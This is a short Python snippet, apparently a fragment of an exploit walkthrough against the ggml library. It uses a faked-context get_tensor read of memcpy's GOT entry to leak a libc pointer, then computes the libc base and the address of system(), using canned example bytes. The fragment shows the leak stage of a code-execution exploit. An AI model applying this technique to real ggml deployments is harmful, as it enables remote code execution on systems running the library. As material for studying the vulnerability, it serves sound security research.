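ggml_base = 0x7f1234400000           # from the previous sketch

# GOT entries sit at ggml_base + the static GOT vaddr; aiming the faked-context
# get_tensor read at got['memcpy'] hands back a resolved libc pointer.
got_memcpy = ggml_base + libggml.got["memcpy"]

memcpy_leak = u64(b"\x40\x12\x71\x34\x12\x7f\x00\x00")   # canned example bytes
libc_base   = memcpy_leak - libc.symbols["memcpy"]
system_addr = libc_base + libc.symbols["system"]
print(hex(libc_base), hex(system_addr))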